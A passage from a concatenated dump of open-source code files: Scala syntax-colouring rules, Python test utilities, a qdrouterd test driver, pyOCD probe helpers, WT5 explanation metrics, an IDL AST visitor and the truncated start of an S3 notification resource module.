return colorer.match_seq(s, i, kind="operator", seq="<=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule20(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="<:",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule21(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="+",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule22(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="-",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule23(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="/",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule24(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="*",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule25(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq=">",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule26(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="<",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule27(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="%",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule28(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="&",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule29(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="|",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule30(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="^",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule31(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="`",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule32(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="~",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule33(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="}",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule34(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="{",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule35(colorer, s, i):
return colorer.match_seq(s, i, kind="null", seq=".",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule36(colorer, s, i):
return colorer.match_seq(s, i, kind="null", seq=",",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule37(colorer, s, i):
return colorer.match_seq(s, i, kind="null", seq=";",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule38(colorer, s, i):
return colorer.match_seq(s, i, kind="null", seq="]",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule39(colorer, s, i):
return colorer.match_seq(s, i, kind="null", seq="[",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule40(colorer, s, i):
return colorer.match_seq(s, i, kind="null", seq="?",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule41(colorer, s, i):
return colorer.match_seq(s, i, kind="null", seq=":",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule42(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal2", regexp=":\\s*\\w+(\\.\\w+)*(#\\w+)?",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule43(colorer, s, i):
return colorer.match_mark_previous(s, i, kind="function", pattern="(",
at_line_start=False, at_whitespace_end=False, at_word_start=False, exclude_match=False)
def scala_rule44(colorer, s, i):
return colorer.match_span(s, i, kind="", begin="case", end="=>",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="scala::pattern",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def scala_rule45(colorer, s, i):
return colorer.match_keywords(s, i)
# Rules dict for scala_primary ruleset.
rulesDict2 = {
"!": [scala_rule16,],
"\"": [scala_rule7,scala_rule8,],
"%": [scala_rule27,],
"&": [scala_rule28,],
"'": [scala_rule9,scala_rule10,],
"(": [scala_rule43,],
")": [scala_rule14,],
"*": [scala_rule24,],
"+": [scala_rule21,],
",": [scala_rule36,],
"-": [scala_rule22,],
".": [scala_rule35,],
"/": [scala_rule1,scala_rule2,scala_rule3,scala_rule4,scala_rule23,],
"0": [scala_rule45,],
"1": [scala_rule45,],
"2": [scala_rule45,],
"3": [scala_rule45,],
"4": [scala_rule45,],
"5": [scala_rule45,],
"6": [scala_rule45,],
"7": [scala_rule45,],
"8": [scala_rule45,],
"9": [scala_rule45,],
":": [scala_rule41,scala_rule42,],
";": [scala_rule37,],
"<": [scala_rule5,scala_rule6,scala_rule12,scala_rule19,scala_rule20,scala_rule26,],
"=": [scala_rule15,scala_rule45,],
">": [scala_rule13,scala_rule17,scala_rule18,scala_rule25,scala_rule45,],
"?": [scala_rule40,],
"@": [scala_rule45,],
"A": [scala_rule45,],
"B": [scala_rule45,],
"C": [scala_rule45,],
"D": [scala_rule45,],
"E": [scala_rule45,],
"F": [scala_rule45,],
"G": [scala_rule45,],
"H": [scala_rule45,],
"I": [scala_rule45,],
"J": [scala_rule45,],
"K": [scala_rule45,],
"L": [scala_rule45,],
"M": [scala_rule45,],
"N": [scala_rule45,],
"O": [scala_rule45,],
"P": [scala_rule45,],
"Q": [scala_rule45,],
"R": [scala_rule45,],
"S": [scala_rule45,],
"T": [scala_rule45,],
"U": [scala_rule45,],
"V": [scala_rule45,],
"W": [scala_rule45,],
"X": [scala_rule45,],
"Y": [scala_rule45,],
"Z": [scala_rule45,],
"[": [scala_rule11,scala_rule39,],
"]": [scala_rule38,],
"^": [scala_rule30,],
"`": [scala_rule31,],
"a": [scala_rule45,],
"b": [scala_rule45,],
"c": [scala_rule44,scala_rule45,],
"d": [scala_rule45,],
"e": [scala_rule45,],
"f": [scala_rule45,],
"g": [scala_rule45,],
"h": [scala_rule45,],
"i": [scala_rule45,],
"j": [scala_rule45,],
"k": [scala_rule45,],
"l": [scala_rule45,],
"m": [scala_rule45,],
"n": [scala_rule45,],
"o": [scala_rule45,],
"p": [scala_rule45,],
"q": [scala_rule45,],
"r": [scala_rule45,],
"s": [scala_rule45,],
"t": [scala_rule45,],
"u": [scala_rule45,],
"v": [scala_rule45,],
"w": [scala_rule45,],
"x": [scala_rule45,],
"y": [scala_rule45,],
"z": [scala_rule45,],
"{": [scala_rule34,],
"|": [scala_rule29,],
"}": [scala_rule33,],
"~": [scala_rule32,],
}
# Rules for scala_pattern ruleset.
def scala_rule46(colorer, s, i):
return colorer.match_seq(s, i, kind="operator", seq="@",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
# Rules dict for scala_pattern ruleset.
rulesDict3 = {
"@": [scala_rule46,],
}
# Rules for scala_scaladoc ruleset.
def scala_rule47(colorer, s, i):
return colorer.match_seq(s, i, kind="comment3", seq="{",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule48(colorer, s, i):
return colorer.match_seq(s, i, kind="comment3", seq="*",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule49(colorer, s, i):
return colorer.match_span(s, i, kind="markup", begin="<pre>", end="</pre>",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="scala::scaladoc_pre",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def scala_rule50(colorer, s, i):
return colorer.match_span(s, i, kind="comment1", begin="<!--", end="-->",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def scala_rule51(colorer, s, i):
return colorer.match_seq(s, i, kind="comment3", seq="<<",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule52(colorer, s, i):
return colorer.match_seq(s, i, kind="comment3", seq="<=",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule53(colorer, s, i):
return colorer.match_seq(s, i, kind="comment3", seq="< ",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="")
def scala_rule54(colorer, s, i):
return colorer.match_span(s, i, kind="markup", begin="<", end=">",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="xml::tags",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def scala_rule55(colorer, s, i):
return colorer.match_keywords(s, i)
# Rules dict for scala_scaladoc ruleset.
rulesDict4 = {
"*": [scala_rule48,],
"0": [scala_rule55,],
"1": [scala_rule55,],
"2": [scala_rule55,],
"3": [scala_rule55,],
"4": [scala_rule55,],
"5": [scala_rule55,],
"6": [scala_rule55,],
"7": [scala_rule55,],
"8": [scala_rule55,],
"9": [scala_rule55,],
"<": [scala_rule49,scala_rule50,scala_rule51,scala_rule52,scala_rule53,scala_rule54,],
"=": [scala_rule55,],
">": [scala_rule55,],
"@": [scala_rule55,],
"A": [scala_rule55,],
"B": [scala_rule55,],
"C": [scala_rule55,],
"D": [scala_rule55,],
"E": [scala_rule55,],
"F": [scala_rule55,],
"G": [scala_rule55,],
"H": [scala_rule55,],
"I": [scala_rule55,],
"J": [scala_rule55,],
"K": [scala_rule55,],
"L": [scala_rule55,],
"M": [scala_rule55,],
"N": [scala_rule55,],
"O": [scala_rule55,],
"P": [scala_rule55,],
"Q": [scala_rule55,],
"R": [scala_rule55,],
"S": [scala_rule55,],
"T": [scala_rule55,],
"U": [scala_rule55,],
"V": [scala_rule55,],
"W": [scala_rule55,],
"X": [scala_rule55,],
"Y": [scala_rule55,],
"Z": [scala_rule55,],
"a": [scala_rule55,],
"b": [scala_rule55,],
"c": [scala_rule55,],
"d": [scala_rule55,],
"e": [scala_rule55,],
"f": [scala_rule55,],
"g": [scala_rule55,],
"h": [scala_rule55,],
"i": [scala_rule55,],
"j": [scala_rule55,],
"k": [scala_rule55,],
"l": [scala_rule55,],
"m": [scala_rule55,],
"n": [scala_rule55,],
"o": [scala_rule55,],
"p": [scala_rule55,],
"q": [scala_rule55,],
"r": [scala_rule55,],
"s": [scala_rule55,],
"t": [scala_rule55,],
"u": [scala_rule55,],
"v": [scala_rule55,],
"w": [scala_rule55,],
"x": [scala_rule55,],
"y": [scala_rule55,],
"z": [scala_rule55,],
"{": [scala_rule47,],
}
# Rules for scala_scaladoc_pre ruleset.
# Rules dict for scala_scaladoc_pre ruleset.
rulesDict5 = {}
# Rules for scala_xml_tag ruleset.
def scala_rule56(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="\"", end="\"",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def scala_rule57(colorer, s, i):
return colorer.match_span(s, i, kind="literal1", begin="'", end="'",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="",exclude_match=False,
no_escape=False, no_line_break=True, no_word_break=False)
def scala_rule58(colorer, s, i):
return colorer.match_span(s, i, kind="", begin="{", end="}",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="scala::main",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def scala_rule59(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal3", regexp=">$",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::main")
def scala_rule60(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal3", regexp=">\\s*;",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::main")
def scala_rule61(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal3", regexp=">\\s*\\)",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::main")
def scala_rule62(colorer, s, i):
return colorer.match_seq(s, i, kind="literal3", seq=">",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::xml_text")
# Rules dict for scala_xml_tag ruleset.
rulesDict6 = {
"\"": [scala_rule56,],
"'": [scala_rule57,],
">": [scala_rule59,scala_rule60,scala_rule61,scala_rule62,],
"{": [scala_rule58,],
}
# Rules for scala_xml_text ruleset.
def scala_rule63(colorer, s, i):
return colorer.match_span(s, i, kind="", begin="{", end="}",
at_line_start=False, at_whitespace_end=False, at_word_start=False,
delegate="scala::main",exclude_match=False,
no_escape=False, no_line_break=False, no_word_break=False)
def scala_rule64(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="comment2", regexp="<!--",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::xml_comment")
def scala_rule65(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="literal3", regexp="<\\/?\\w*",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::xml_tag")
# Rules dict for scala_xml_text ruleset.
rulesDict7 = {
"<": [scala_rule64,scala_rule65,],
"{": [scala_rule63,],
}
# Rules for scala_xml_comment ruleset.
def scala_rule66(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="comment2", regexp="-->$",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::main")
def scala_rule67(colorer, s, i):
return colorer.match_seq_regexp(s, i, kind="comment2", regexp="-->\\s*;",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::main")
def scala_rule68(colorer, s, i):
return colorer.match_seq(s, i, kind="comment2", seq="-->",
at_line_start=False, at_whitespace_end=False, at_word_start=False, delegate="scala::xml_text")
# Rules dict for scala_xml_comment ruleset.
rulesDict8 = {
"-": [scala_rule66,scala_rule67,scala_rule68,],
}
# x.rulesDictDict for scala mode.
rulesDictDict = {
"scala_main": rulesDict1,
"scala_pattern": rulesDict3,
"scala_primary": rulesDict2,
"scala_scaladoc": rulesDict4,
"scala_scaladoc_pre": rulesDict5,
"scala_xml_comment": rulesDict8,
"scala_xml_tag": rulesDict6,
"scala_xml_text": rulesDict7,
}
# Import dict for scala mode.
importDict = {
"scala_main": ["scala_main::primary",],
"scala_pattern": ["scala_pattern::primary",],
}
|
tests/utils/method_test_case.py | VeliborKrivokuca/batavia | 1,256 | 11178330 | <filename>tests/utils/method_test_case.py<gh_stars>1000+
from .adjust_code import adjust
from .expected_failure import NotImplementedToExpectedFailure
from .samples import SAMPLE_DATA, SAMPLE_SUBSTITUTIONS
def _one_arg_method_test(name, module, cls_, f, examples):
def func(self):
self.assertOneArgMethod(
name=name,
module=module,
cls_name=cls_,
method_name=f,
arg_values=examples,
substitutions=getattr(self, 'substitutions', SAMPLE_SUBSTITUTIONS)
)
return func
class MethodTestCase(NotImplementedToExpectedFailure):
def assertOneArgMethod(self, name, module, cls_name, method_name, arg_values, substitutions, **kwargs):
self.assertCodeExecution(
'##################################################\n'.join(
adjust("""
try:
print('>>> import {m}')
print('>>> obj = {m}.{c}()')
print('>>> f = obj.{f}')
print('>>> x = {a}')
print('>>> f(x)')
import {m}
obj = {m}.{c}()
f = obj.{f}
x = {a}
print(f(x))
except Exception as e:
print('///', type(e), ':', e)
print()
""".format(m=module, c=cls_name, f=method_name, a=arg))
for arg in arg_values
),
'Error running {} module {}'.format(module, name),
substitutions=substitutions,
run_in_function=False,
**kwargs
)
@classmethod
def add_one_arg_method_tests(test_cls, module, cls_name, functions):
for func in functions:
for datatype, examples in SAMPLE_DATA.items():
name = 'test_{}_{}_{}_{}'.format(
module, cls_name, func, datatype
)
setattr(
test_cls,
name,
_one_arg_method_test(name, module, cls_name, func, examples)
)
|
pifpaf/drivers/qdrouterd.py | OmarTrigui/pifpaf | 181 | 11178345 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from pifpaf import drivers
class QdrouterdDriver(drivers.Driver):
DEFAULT_PORT = 5672
DEFAULT_ARTEMIS_PORT = 5673
DEFAULT_USERNAME = "pifpaf"
DEFAULT_PASSWORD = "<PASSWORD>"
DEFAULT_DOMAIN = "localhost"
def __init__(self, port=DEFAULT_PORT,
artemis_port=DEFAULT_ARTEMIS_PORT,
username=DEFAULT_USERNAME,
password=<PASSWORD>,
domain=DEFAULT_DOMAIN,
mesh=False,
direct_notify=False,
**kwargs):
"""Create a new Qdrouterd instance."""
super(QdrouterdDriver, self).__init__(templatedir="qdrouterd",
**kwargs)
self.port = port
self.artemis_port = artemis_port
self.username = username
self.password = password
self.domain = domain
self.mesh = mesh
self.direct_notify = direct_notify
@classmethod
def get_options(cls):
return [
{"param_decls": ["--port"],
"type": int,
"default": cls.DEFAULT_PORT,
"help": "port to use for Qdrouterd"},
{"param_decls": ["--artemis_port"],
"type": int,
"default": cls.DEFAULT_ARTEMIS_PORT,
"help": "port to use for broker link"},
{"param_decls": ["--mesh"],
"is_flag": True,
"help": "TODO: Create a 3 HA node mesh"},
{"param_decls": ["--direct_notify"],
"is_flag": True,
"help": "direct message notify and do not attach to broker"},
{"param_decls": ["--username"],
"default": cls.DEFAULT_USERNAME,
"help": "sasl username"},
{"param_decls": ["--password"],
"default": cls.DEFAULT_PASSWORD,
"help": "sasl password"},
{"param_decls": ["--domain"],
"default": cls.DEFAULT_DOMAIN,
"help": "sasl domain"},
]
def saslpasswd2(self, username, password, sasl_db):
self._exec(["saslpasswd2", "-c", "-p", "-f",
sasl_db, username], stdin=password.encode())
def _setUp(self):
super(QdrouterdDriver, self)._setUp()
# setup log, etc used by qdrouterd
logdir = os.path.join(self.tempdir, "log")
os.makedirs(logdir)
etcdir = os.path.join(self.tempdir, "etc")
os.makedirs(etcdir)
sasldir = os.path.join(etcdir, "sasl2")
os.makedirs(sasldir)
logfile = os.path.join(logdir, "qdrouterd.log")
template_env = {
"TMP_DIR": self.tempdir,
"PORT": self.port,
"ARTEMIS_PORT": self.artemis_port,
"SASL_DIR": sasldir,
"LOG_FILE": logfile,
"DIRECT_NOTIFY": self.direct_notify,
}
qdr_cfg = os.path.join(etcdir, "qdrouterd.conf")
self.template("qdrouterd.conf",
template_env,
qdr_cfg)
sasl_cfg = os.path.join(sasldir, "sasl_qdrouterd.conf")
self.template("sasl_qdrouterd.conf",
template_env,
sasl_cfg)
sasl_db = os.path.join(sasldir, "qdrouterd.sasldb")
self.saslpasswd2(self.username, self.password, sasl_db)
c, _ = self._exec(["qdrouterd", "-c", qdr_cfg],
wait_for_port=self.port)
self.putenv("QDROUTERD_PORT", str(self.port))
self.putenv("QDROUTERD_URL", "amqp://localhost:%s" % self.port)
self.putenv("URL", "amqp://%s:%s@localhost:%s" % (
self.username, self.password, self.port))
|
mac/pyobjc-core/PyObjCTest/test_convenience.py | albertz/music-player | 132 | 11178366 | from PyObjCTools.TestSupport import *
import objc
import objc._convenience as convenience
class TestConvenienceHelpers (TestCase):
def test_add_for_selector(self):
methods = [
('add', lambda self, x: self.testMethod_(x))
]
with filterWarnings("error", DeprecationWarning):
self.assertRaises(DeprecationWarning, objc.addConvenienceForSelector, b'testMethod:', methods)
if b'testMethod' in convenience._CONVENIENCE_METHODS:
del convenience._CONVENIENCE_METHODS[b'testMethods:']
with filterWarnings("ignore", DeprecationWarning):
self.assertNotIn(b'testMethod:', convenience._CONVENIENCE_METHODS)
try:
objc.addConvenienceForSelector(b'testMethod:', methods)
self.assertEqual(convenience._CONVENIENCE_METHODS[b'testMethod:'], methods)
finally:
if b'testMethod' in convenience._CONVENIENCE_METHODS:
del convenience._CONVENIENCE_METHODS[b'testMethods:']
def test_add_for_class(self):
self.assertNotIn("MyObject", convenience.CLASS_METHODS)
methods = [
('info', lambda self: self.description())
]
try:
objc.addConvenienceForClass("MyObject", methods)
self.assertEqual(convenience.CLASS_METHODS["MyObject"], methods)
finally:
if 'MyObject' in convenience.CLASS_METHODS:
del convenience.CLASS_METHODS["MyObject"]
class TestBasicConveniences (TestCase):
def testBundleForClass(self):
orig = convenience.currentBundle
try:
the_bundle = object()
def currentBundle():
return the_bundle
convenience.currentBundle = currentBundle
class OC_Test_Basic_Convenience_1 (objc.lookUpClass("NSObject")):
pass
self.assertIs(OC_Test_Basic_Convenience_1.bundleForClass(), the_bundle)
finally:
convenience.currentBundle = orig
def test_kvc_helper(self):
o = objc.lookUpClass('NSURL').URLWithString_('http://www.python.org/')
self.assertEqual(o.host(), 'www.python.org')
self.assertEqual(o._.host, 'www.python.org')
self.assertEqual(o._['host'], 'www.python.org')
self.assertRaises(TypeError, lambda: o._[42])
self.assertEqual(repr(o._), '<KVC accessor for %r>'%(o,))
self.assertRaises(AttributeError, getattr, o._, 'nosuchattr')
self.assertRaises(TypeError, o._.__setitem__, 42)
o = objc.lookUpClass('NSMutableDictionary').dictionary()
o._.key1 = 1
o._['key2'] = 2
self.assertEqual(o, {'key1': 1, 'key2': 2 })
self.assertRaises(AttributeError, o._.nosuchattr)
self.assertRaises(TypeError, o._.__setitem__, 42)
# TODO: Explicit tests for add_convenience_methods.
if __name__ == "__main__":
main()
|
tests/base_ming.py | tcmike/depot | 128 | 11178377 | from __future__ import absolute_import
import os
import ming
from ming import Session
from ming.odm import ThreadLocalODMSession
from ming import create_datastore
from depot.fields.ming import DepotExtension
mainsession = Session()
DBSession = ThreadLocalODMSession(mainsession, extensions=(DepotExtension, ))
database_setup = False
datastore = None
def setup_database():
global datastore, database_setup
if not database_setup:
datastore = create_datastore(os.environ.get('MONGOURL', 'mim:///depottest'))
mainsession.bind = datastore
ming.odm.Mapper.compile_all()
def clear_database():
global datastore, database_setup
if not database_setup:
setup_database()
try:
# On MIM drop all data
datastore.conn.drop_all()
except TypeError:
# On MongoDB drop database
datastore.conn.drop_database(datastore.db)
|
pyocd/probe/common.py | claymation/pyOCD | 276 | 11178378 | # pyOCD debugger
# Copyright (c) 2019 Arm Limited
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
LOG = logging.getLogger(__name__)
## Whether the warning about no libusb was printed already.
#
# Used to prevent warning spewage if repeatedly scanning for probes, such as when ConnectHelper
# is used in blocking mode and no probes are connected.
did_show_no_libusb_warning = False
## Set of VID/PID tuples for which libusb errors have been reported.
#
# Used to prevent spewing lots of errors for the same devices when repeatedly scanning for probes.
libusb_error_device_set = set()
def show_no_libusb_warning():
"""! @brief Logs a warning about missing libusb library only the first time it is called."""
global did_show_no_libusb_warning
if not did_show_no_libusb_warning:
LOG.warning("STLink, CMSIS-DAPv2 and PicoProbe probes are not supported because no libusb library was found.")
did_show_no_libusb_warning = True
def should_show_libusb_device_error(vidpid):
"""! @brief Returns whether a debug warning should be shown for the given VID/PID pair.
The first time a given VID/PID is passed to this function, the result will be True. Any
subsequent times, False will be returned for the same VID/PID pair.
@param vidpi A bi-tuple of USB VID and PID, in that order.
"""
should_log = vidpid not in libusb_error_device_set
libusb_error_device_set.add(vidpid)
return should_log
|
wt5/wt5/metrics.py | deepneuralmachine/google-research | 23,901 | 11178381 | <reponame>deepneuralmachine/google-research
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""WT5 metrics."""
import numpy as np
import sklearn.metrics
import t5.evaluation
def esnli_metric(targets, predictions):
"""Compute label accuracy and BLEU score for e-SNLI predictions.
This function gets the label and explanation and computes accuracy and
BLEU score on the explanation.
Args:
targets: list of dict of label and explanation
predictions: list of dict of label and explanation
Returns:
a dict with accuracy and bleu score.
"""
def get_label_and_explanation(answers):
"""Helper function to get lists of labels and explanations from a dict."""
labels = []
explanations_1 = []
explanations_2 = []
for answer in answers:
for key, value in answer.items():
if key == "label":
labels.append(value)
# In e-snli, the authors only use the first two explanations to compute
# the BLEU score.
elif key == "explanations":
explanations_1.append("" if not value else value[0])
if len(value) > 1:
explanations_2.append(value[1])
else:
raise RuntimeError(
"Unexpected key:%s provided. to metric fn." % (key))
if explanations_2:
return labels, [explanations_1, explanations_2]
else:
return labels, explanations_1
def get_first_explanation_length(explanations):
return len(explanations) if isinstance(explanations, str) else len(
explanations[0])
target_labels, target_explanations = get_label_and_explanation(targets)
# The model can only predict one explanation
for prediction in predictions:
if prediction["explanations"]:
prediction["explanations"] = [prediction["explanations"][0]]
prediction_labels, prediction_explanations = get_label_and_explanation(
predictions)
return {
"accuracy":
t5.evaluation.metrics.accuracy(target_labels, prediction_labels)
["accuracy"],
"bleu":
t5.evaluation.metrics.bleu(target_explanations,
prediction_explanations)["bleu"],
"expln1_length":
get_first_explanation_length(prediction_explanations)
}
def extractive_explanations_metric(targets, predictions):
"""Compute label accuracy and macro F1 score for explanations."""
def get_labels_spans_and_expls(answers):
"""Gets a list of labels and spans from a list of dicts."""
labels = []
spans = []
span_arrays = []
explanations = []
for answer in answers:
for key, value in answer.items():
if key == "label":
labels.append(value)
elif key == "overlap_spans":
spans.append(value)
elif key == "span_array":
span_arrays.append(value)
elif key == "explanations":
explanations.append(value)
else:
raise ValueError("Unexpected key found in answers dict: %s" % key)
return labels, spans, span_arrays, explanations
labels_t, spans_t, arrays_t, _ = get_labels_spans_and_expls(targets)
labels_p, spans_p, arrays_p, explns_p = get_labels_spans_and_expls(
predictions)
# Compute f1 score for each example in the target prediction pair
f1_scores = []
for gt_span, pred_span in zip(spans_t, spans_p):
elem_prec = len(set(gt_span)
& set(pred_span)) / len(pred_span) if pred_span else 0
elem_rec = len(set(gt_span)
& set(pred_span)) / len(gt_span) if gt_span else 0
if elem_prec == 0 or elem_rec == 0:
elem_f1 = 0
else:
elem_f1 = 2 * elem_prec * elem_rec / (elem_prec + elem_rec)
f1_scores.append(elem_f1)
exact_match_f1 = np.mean(f1_scores) * 100
partial_match_f1 = 100 * np.mean(
[sklearn.metrics.f1_score(t, p) for t, p in zip(arrays_t, arrays_p)]
)
def get_avg_num_explanations(explanations):
total_explns = 0
for e in explanations:
total_explns += len(e)
return float(total_explns)/len(explanations) if explanations else 0.0
return {
"accuracy": 100 * sklearn.metrics.accuracy_score(labels_t, labels_p),
"f1": exact_match_f1,
"partial match f1": partial_match_f1,
"avg_explanation_count": get_avg_num_explanations(explns_p),
}
|
ppapi/generators/idl_visitor.py | zealoussnow/chromium | 14,668 | 11178394 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Visitor Object for traversing AST """
#
# IDLVisitor
#
# The IDLVisitor class will traverse an AST truncating portions of the tree
# when 'VisitFilter' returns false. After the filter returns true, for each
# node, the visitor will call the 'Arrive' member passing in the node and
# and generic data object from the parent call. The returned value is then
# passed to all children who's results are aggregated into a list. The child
# results along with the original Arrive result are passed to the Depart
# function which returns the final result of the Visit. By default this is
# the exact value that was return from the original arrive.
#
class IDLVisitor(object):
def __init__(self):
pass
# Return TRUE if the node should be visited
def VisitFilter(self, node, data):
return True
def Visit(self, node, data):
if not self.VisitFilter(node, data): return None
childdata = []
newdata = self.Arrive(node, data)
for child in node.GetChildren():
ret = self.Visit(child, newdata)
if ret is not None:
childdata.append(ret)
return self.Depart(node, newdata, childdata)
def Arrive(self, node, data):
__pychecker__ = 'unusednames=node'
return data
def Depart(self, node, data, childdata):
__pychecker__ = 'unusednames=node,childdata'
return data
|
gordon/resources/s3.py | patgoley/gordon | 2,204 | 11178395 | import re
from collections import defaultdict, Counter
import six
import troposphere
from troposphere import sqs, sns, awslambda
from . import base
from gordon import exceptions
from gordon import utils
from gordon.actions import Ref
from gordon.contrib.s3.resources import (
S3BucketNotificationConfiguration,
NotificationConfiguration, KeyFilter
)
class BaseNotification(object):
def __init__(self, bucket_notification_configuration, **kwargs):
self.settings = kwargs
self.bucket_notification_configuration = bucket_notification_configuration
self.events = []
# Validate all notifications have an id. This important because
# we'll rely on this id to create/modify/delete notifactions
if 'id' in self.settings:
self.id = self.settings['id']
else:
raise exceptions.ResourceValidationError(
(
"You need to define an id which identifies the "
"notification {}").format(self.settings)
)
# Validate that events is present, and that it contains valid values
if 'events' in self.settings and self.settings['events']:
for event in self.settings['events']:
event_match = re.match(r's3\:(\w+|\*)(?:\:(\w+|\*))?', event)
if event_match:
self.events.append([event] + list(event_match.groups()))
else:
raise exceptions.ResourceValidationError(
"Invalid event {}".format(event)
)
else:
raise exceptions.ResourceValidationError(
("You need to define a list of events for the "
"notification {}").format(self.name)
)
# Validate that filters are a subset of (prefix, suffix) and keys
# are not duplicated.
_filters = self.settings.get('key_filters', {})
if set(_filters.values()) > set(('prefix', 'suffix')):
raise exceptions.ResourceValidationError(
"""You can't create filters for '{}'.""".format(
', '.join(_filters)
)
)
else:
self.filters = [(k, v) for k, v in six.iteritems(_filters)]
@classmethod
def from_dict(cls, data, id, bucket_notification_configuration):
notification_type = set(('lambda', 'topic', 'queue')) & set(data.keys())
if len(notification_type) != 1:
raise exceptions.ResourceValidationError(
(
"You need to define either a lamda, a queue or a topic "
